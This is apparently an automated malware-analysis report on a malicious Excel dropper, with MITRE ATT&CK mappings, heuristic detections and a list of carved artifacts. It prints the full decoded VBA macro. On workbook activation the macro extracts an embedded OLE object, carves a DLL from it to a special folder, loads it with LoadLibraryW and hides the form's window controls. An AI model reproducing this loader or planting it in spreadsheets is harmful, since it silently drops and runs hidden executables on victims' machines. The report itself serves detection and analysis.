MALICIOUS
440
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1027 Obfuscated Files or Information
The Excel file contains VBA macros that leverage WScript.Shell and CreateObject to execute embedded code. A critical heuristic indicates an ActiveX event launches a decoded Excel4 macro, which likely uses the Shell() function to execute or load a second-stage payload. This payload is identified as an embedded PE executable (embedded_office_00003384.exe), suggesting a dropper functionality. The presence of VirtualAlloc and LoadLibrary API references further supports the execution of external or dynamically loaded code.
Heuristics 10
-
ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set WaitForSingle = CreateObject("WScript.Shell") -
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.Matched line in script
Debug.Print Temp1 CCount = Application.ExecuteExcel4Macro(Temp1) Debug.Print CCount -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Case 0 Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose") Case 1 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12324 bytes |
SHA-256: 1335cf9c55b62e62cfc7e3cb67f2bfd7caed70b057d29bdde217e9f1662bb4c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.AppStart
End If
End Sub
Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
#If Win64 Then
Public Declare PtrSafe Function Bootsrap Lib _
"libMongo2.dll" () As Integer
Public Declare PtrSafe Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
Public Declare Function Bootsrap2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function Bootsrap Lib _
"libMongo1.dll" () As Integer
#End If
Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
Dim d_5() As Long
ReDim d_5(1 To fl)
d_5(1) = CByte(50 + 27)
d_5(2) = CByte(50 + 40)
d_5(3) = CByte(50 + 94)
d_1 = FreeFile
Open s For Binary Access Read As d_1
Dim cur As Integer
cur = 1
Do While Not EOF(d_1)
Get d_1, , d_2
If d_2 = d_5(1) Then
Get d_1, , d_3
If d_3 = d_5(2) Then
Get d_1, , d_4
If d_4 = d_5(3) Then
If cur = d_6 Then
For k = 4 To fl
Get d_1, , d_2
d_5(k) = d_2
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close d_1
d_1 = FreeFile
Open nm For Binary Lock Read Write As #d_1
For i = LBound(d_5) To UBound(d_5)
Put #d_1, , CByte(d_5(i))
Next i
Close #d_1
End Sub
Public Function ITestModule_GetCase(ByVal lIndex As Long)
If tracemod Then
g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
End If
numcases = numcases + 1
Select Case lIndex
Case 0
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
Case 1
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
Case 2
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
Case 3
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
Case 4
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
Case 5
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
Case 6
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
Case 7
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
Case 8
Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
Case 9
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
Case 10
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldattributes")
Case 11
Set ca.ses(numcases - 1) = CreateObject("adolvl0.flddefinedsize")
Case 12
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldname")
Case 13
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldoriginalvalue")
Case 14
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldprecision")
Case 15
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldtype")
Case 16
Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldvalue")
Case 17
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsactivecn")
Case 18
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsclose")
Case 19
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmove")
Case 20
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovefirst")
Case 21
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmovenext")
Case 22
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsmoveprev")
Case 23
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsopen")
Case 24
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssource")
Case 25
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rssupports")
Case 26
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsbof")
Case 27
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rseof")
Case 28
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rscachesize")
Case 29
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rspagesize")
Case 30
Set ca.ses(numcases - 1) = CreateObject("adolvl0.rsrequery")
End Select
ca.ses(numcases - 1).SetCaseError g_errorobj
ca.ses(numcases - 1).SetCaseProvider g_provobj
Set Locprov = g_provobj
Set ITestModule_GetCase = ca.ses(numcases - 1)
End Function
Public Function ITestModule_GetErrorInterface()
Set ITestModule_GetErrorInterface = g_errorobj
End Function
Public Function ITestModule_GetProviderInterface()
Set ITestModule_GetProviderInterface = g_provobj
End Function
Public Sub ITestModule_SetErrorInterface(ByVal pError)
Set g_errorobj = pError
If tracemod Then
g_errorobj.Transmit "Inside: ITestModule_SetErrorInterface" + Chr(10)
End If
End Sub
Public Sub ITestModule_SetMallocSpyCallback(pbVoodoo As Byte)
tracemod = False
numcases = 0
'MsgBox ("ITestModule_SetMallocSpyCallback")
End Sub
Public Sub ITestModule_SetProviderInterface(ByVal pProvInfo)
On Error GoTo ixx
Set g_provobj = pProvInfo
For i = 0 To numcases - 1
ca.ses(i).SetCaseProvider g_provobj
Next i
Exit Sub
ixx:
MsgBox Err.Description
End Sub
Public Function ITestModule_Terminate() As Boolean
ITestModule_Terminate = True
End Function
Public Sub AppStart()
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
Dim WaitForSingle As Object
Dim SpecialPath As String
Set WaitForSingle = CreateObject("WScript.Shell")
UserForm3.TextBox1.Tag = WaitForSingle.ExpandEnvironmentStrings("%" + UserForm3.TextBox1.Tag + "%")
UserForm3.TextBox1.Tag = Replace(UserForm3.TextBox1.Tag, "%", "")
UserForm3.TextBox2.Tag = WaitForSingle.SpecialFolders(UserForm3.TextBox2.Tag)
ChDir (UserForm3.TextBox1.Tag)
UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Next"")"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5A3D2CBB-FB46-4DB2-AF06-BE71FA9283E9}{2B3E03C1-B346-4B10-B5BC-52032E0329B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub
Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long) As Long
Private Declare PtrSafe Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#Else
Private Declare Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#End If
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)
If show = False Then
SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
Else
SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
End Sub
Attribute VB_Name = "Module3"
Sub test()
Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)
For R = 1 To RCount
For C = 1 To CCount
Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
Next
Next
Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr
End Sub
Public Sub ReplaceCurrentModule()
NameFav = UserForm3.TextBox1.Tag + "\favorite" + ".xlsx"
ZipName = NameFav + ".zip"
ZipFolder = UserForm3.TextBox1.Tag '& "\UnzTmp"
Dim nm As String
Dim API_LENGTH As Long
Dim d_6 As Integer
nm = UserForm3.TextBox2.Tag + "\libMongo1"
API_LENGTH = 282624
d_6 = 1
#If Win64 Then
nm = UserForm3.TextBox2.Tag + "\libMongo2"
API_LENGTH = 230912
d_6 = 2
#End If
nm = nm + ".d" + "ll"
KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
ActiveWorkbook.SaveAs NameFav, FileFormat:=51
DoEvents
ActiveWorkbook.Close
DoEvents
FileCopy NameFav, ZipName
Set oApp = CreateObject("Shell." + "Application")
oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
ChDir (UserForm3.TextBox2.Tag)
No_Bootsrap = Bootsrap2(nm)
Bootsrap
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{C6DC58FE-06D5-4E80-95FA-170CB81DE014}{681B466D-E30B-41B1-9314-F7CBD4BFF3AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module4"
Attribute VB_Name = "Module5"
Attribute VB_Name = "Module6"
|
|||
embedded_office_00003384.exe |
embedded-pe | Office MZ+PE at offset 0x3384 | 723068 bytes |
SHA-256: 4f858f9af608f99073b952a45289a66aa49e1e614a54377cbad72638d9941332 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): WScript.Shell
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD00FAA26E/Ole10Native | 526883 bytes |
SHA-256: aa7d415120f22ad80905c574ffb39ef59713b52a70790d214c689b634aa314ad |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.